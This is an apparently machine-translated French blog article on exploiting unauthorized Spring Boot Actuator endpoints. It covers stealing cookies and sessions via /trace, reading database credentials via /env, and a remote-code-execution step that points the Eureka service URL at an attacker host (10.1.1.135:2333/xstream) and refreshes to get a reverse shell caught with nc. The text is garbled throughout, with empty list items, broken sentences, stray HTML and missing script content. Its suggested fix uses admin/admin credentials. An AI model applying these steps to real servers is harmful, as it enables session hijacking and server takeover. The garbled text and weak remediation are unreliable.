Exemple d'analyse de l'accès non autorisé de Spring Boot Actuator à getshell

Avant-propos

Le chef de département a creusé cette vulnérabilité dans une certaine src C'est un vieux trou qui m'a semblé intéressant, j'ai donc mis en place un environnement local pour la tester.

Actuator est un module fonctionnel fourni par Springboot pour l'introspection et la surveillance des systèmes d'application. Avec l'aide d'Actuator, les développeurs peuvent facilement visualiser et collecter des statistiques sur certains indicateurs de surveillance du système d'application. Lorsque l'actionneur est activé, si les autorisations pertinentes ne sont pas contrôlées, les utilisateurs illégaux peuvent obtenir des informations de surveillance dans le système d'application en accédant aux points de terminaison de l'actionneur par défaut, entraînant une fuite d'informations ou même une prise de contrôle du serveur.

Actuator est un module fonctionnel fourni par Spring Boot, qui peut être utilisé pour l'introspection et la surveillance des systèmes d'application. Les points de terminaison d'exécuteur fournis sont divisés en deux catégories : les points de terminaison natifs et les points de terminaison d'extension définis par l'utilisateur, recherchent les interfaces non autorisées

Utilisez la trace pour obtenir des informations d'authentification (Cookie, Tooken, Session) et utilisez les informations d'authentification pour y accéder. l'interface.

1. env peut divulguer le mot de passe du compte de base de données (mangodb). Bien sûr, le réseau externe doit être ouvert, la possibilité est donc faible.
   

2. Les étrangers disent que les instructions SQL peuvent être exécutées, mais je ne le comprends pas pour le moment
   

3. Découverte de vulnérabilités
   

Il est généralement reconnu que le framework utilisé par l'application Web actuelle est le springboot cadre. Il existe deux manières principales de juger :

4. 
   

   via l'icône de l'étiquette de la page Web de l'application Web (favicon.ico) ; si le développeur de l'application Web n'a pas modifié l'icône par défaut de l'application Web Springboot, alors vous pouvez voir le icône par défaut suivante après avoir accédé à la page d'accueil de l'application Petite icône verte :

5. 
   

1. 
   

Sur la base des deux façons ci-dessus de déterminer si l'application Web actuelle est un framework Springboot, il s'agit d'accéder à différents répertoires pour voir s'il y a une petite icône de feuille verte, puis de trouver un moyen de déclencher le 4xx de l'application dans différents répertoires ou une erreur 5xx, voyez s'il y a une erreur de page d'erreur en marque blanche.

Exploiter

Visitez le point de terminaison /trace pour obtenir des informations de suivi de requête HTTP de base (horodatage, en-tête HTTP, etc.). S'il y a une demande d'opération d'un utilisateur connecté, vous pouvez falsifier des cookies pour vous connecter.

1. 
   

Accédez au point de terminaison /env pour obtenir tous les attributs de l'environnement. Étant donné que l'actionneur surveillera les services de base de données tels que mysql et mangodb sur le site, les informations de base de données mysql et mangodb peuvent parfois être obtenues via les informations de surveillance si la base de données se produit. pour être ouvert sur le réseau public, cela causera Le mal est énorme,

Une mauvaise configuration du point de terminaison /env provoque RCE,

Prérequis : Eureka-Client <1.8.7 (principalement vu dans Spring Cloud Netflix )

spring-cloud-starter-netflix-eureka-client (dépendance fonctionnelle)

Utilisez python3 Pour démarrer le script, vous devez faire attention à deux endroits, l'un est l'adresse IP et le port de réception du shell, et l'autre est le port pour que notre script démarre.

eureka.client.serviceUrl.defaultZone=http://10.1.1.135:2333/xstream

Ensuite, visitez /refresh, récupérez le package modifie la requête get en requête de publication, et les données de publication sont arbitraires,

Ensuite, dans notre fenêtre nc, vous pouvez voir qu'un shell a réussi a rebondi.

Réparation de vulnérabilité

En tant que chien de sécurité, vous ne pouvez pas simplement creuser sans réparer, dans le pom du projet Introduisez la dépendance spring-boot-starter-security sous le fichier .xml

<dependency>
	<groupId>org.springframework.boot</groupId><artifactId>spring-boot-starter-security</artifactId>
</dependency></h3>
<p><img src="https://img.php.cn/upload/article/000/887/227/168480339634948.jpg" alt="Spring Boot Actuator从未授权访问到getshell的示例分析"></p>
<p> Ensuite, activez la fonction de sécurité dans application.properties, configurez le accédez au mot de passe du compte et redémarrez. L'application apparaîtra. </p>
<pre class="brush:php;toolbar:false">management.security.enabled=true
security.user.name=admin
security.user.password=admin

Pour désactiver l'interface, vous pouvez la définir comme suit (par exemple en désactivant l'environnement interface) : #🎜🎜 #

Ce qui précède est le contenu détaillé de. pour plus d'informations, suivez d'autres articles connexes sur le site Web de PHP en chinois!